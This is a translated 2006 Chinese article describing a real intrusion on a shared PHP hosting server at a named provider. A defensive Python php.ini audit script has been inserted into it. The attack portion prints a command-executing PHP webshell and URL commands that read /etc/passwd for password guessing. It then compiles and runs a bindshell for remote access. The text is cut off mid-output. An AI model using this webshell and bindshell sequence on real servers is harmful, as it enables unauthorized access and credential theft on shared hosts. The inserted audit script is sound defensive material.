

Building Security on Linux: Attacks on PHP Configuration Vulnerabilities

Source:  Author:  Date: 2006-08-29


The problem with these sites is mainly that they allow functions such as system() and exec(). Anyone familiar with PHP knows that these functions invoke system commands (even though, through the web server, a PHP program only has nobody privileges), and an ordinary user only needs to sign up for some hosting space to obtain partial write access, so a user can write a web shell program that executes commands. On these servers ordinary users cannot log in, i.e. they are nologin (no login shell; administrators aren't that "generous"!), so using system() and exec() one can bind a shell out of the box~! This article takes the hosting space at 虎翼网 (www.51.net) as the example (whether all of its servers have this flaw I don't know~ I only tested the server my own space is on):
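Everything in this walkthrough hinges on system() and exec() being callable from any user's script, so the check a host administrator wants is whether php.ini's disable_functions directive actually covers the shell-spawning functions. The following is an added example, not code from the original article: it parses a php.ini text (two constructed sample configs are embedded) and lists which of PHP's documented process-spawning functions remain callable.

```python
"""Audit a php.ini for the shell-spawning functions the article relies on.

Added example, not code from the original article. It reads the
disable_functions directive the way PHP does (last non-comment assignment
wins, inline ';' comments ignored) and reports which functions that hand a
command to a shell (system() and exec() as named above, plus PHP's other
documented ones) remain callable by any user's script on a shared host.
"""
import re

# Functions that spawn a process or shell; names from the PHP manual.
SHELL_FUNCTIONS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}

DIRECTIVE = re.compile(r"^disable_functions\s*=\s*(.*)$", re.IGNORECASE)


def parse_disable_functions(ini_text: str) -> set:
    """Return the lower-cased function names listed in disable_functions."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank or comment line
        m = DIRECTIVE.match(line)
        if m:
            value = m.group(1).split(";")[0].strip().strip('"')
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def still_callable(ini_text: str) -> list:
    """Shell-spawning functions a PHP script could still call under this ini."""
    return sorted(SHELL_FUNCTIONS - parse_disable_functions(ini_text))


# Constructed sample configs: the weak one matches the hosts in the article
# (nothing disabled); the hardened one is what a shared host should ship.
WEAK_INI = """
; php.ini (constructed sample): nothing blocked
disable_functions =
"""

HARDENED_INI = """
; php.ini (constructed sample): command execution blocked for all scripts
disable_functions = "system,exec,passthru,shell_exec,popen,proc_open"
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        gaps = still_callable(ini)
        print(f"{name}: " + ("OK" if not gaps else "still callable: " + ", ".join(gaps)))
```

Run it against a real php.ini by passing the file's contents to still_callable(); an empty list means the webshell shown below would have nothing to call.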

1. First write a webshell (easy to do in PHP)

    <?php
    # shell.php3
    echo "<pre>";
    system("$cmd");
    echo "</pre>";
    ?>

2. Upload it to the hosting space

3. Execute it (the actual server name is blurred out)

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=id   (check how much privilege we actually have)
uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)
root is really stingy!

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=uname -ras   (look at the system)
FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 2000:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/passwd   (shadow is certainly not readable)
[the /etc/passwd listing is omitted here]
..................(too many~ omitted)

Only a few users have a shell and can log in; cp it to my directory, and later separate out the usernames to see whether anyone has username=password~ heh heh~

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=set
HOME=/
PS$OPTIND=1
PS2=>
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin
IFS=
What a poor "environment", set up like this....

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/hosts
# $FreeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $
# Host Database
# This file should contain the addresses and aliases
# for local hosts that share this file.
# In the presence of the domain name service or NIS, this file may
# not be consulted at all; see /etc/host.conf for the resolution order.
#
127.0.0.1 localhost localhost.my.domain myname.my.domain
#
# Imaginary network.
#10.0.0.2 myname.my.domain myname
#10.0.0.3 myfriend.my.domain myfriend
#
# According to RFC 1918, you can use the following IP networks for
# private nets which will never be connected to the Internet:
#
# 10.0.0.0 - 10.255.255.255
# 172.16.0.0 - 172.31.255.255
# 192.168.0.0 - 192.168.255.255
#
#

Not too small, eh~ hosts~

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=whereis -b gcc

(Thank heavens~ it has gcc)

gcc: /usr/sbin/gcc   (hooray!!!!!!!!!!!!)

Let me try~ put something big up there and compile it, haha~ so fast!

The webshell is too tiring; binding a shell out is more convenient... (upload a bindshell program; you can also write one yourself in perl or C, neither is hard)

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=gcc -o bind bindshell.c
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=./bind 1234
bind shell too port 1234
telnet xxx.51.net 1234

.....the rest is omitted; anyway, commands can now be executed

Hmm~ it seems this one doesn't have MySQL installed, a pity~ heh heh~~~~~~~~~, oh right, the one at oso.com.cn seems to have it~, but it was shut down recently.....

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=/usr/sbin/rpcinfo -p localhost
portmapper 100000 portmap sunrpc
rstatd 100001 rstat rstat_svc rup perfmeter
rusersd 100002 rusers
nfs 100003 nfsprog
ypserv 100004 ypprog
mountd 100005 mount showmount
ypbind 100007
walld 100008 rwall shutdown
yppasswdd 100009 yppasswd
etherstatd 100010 etherstat
rquotad 100011 rquotaprog quota rquotas
sprayd 100012 spray
3270_mapper 100013
rje_ma
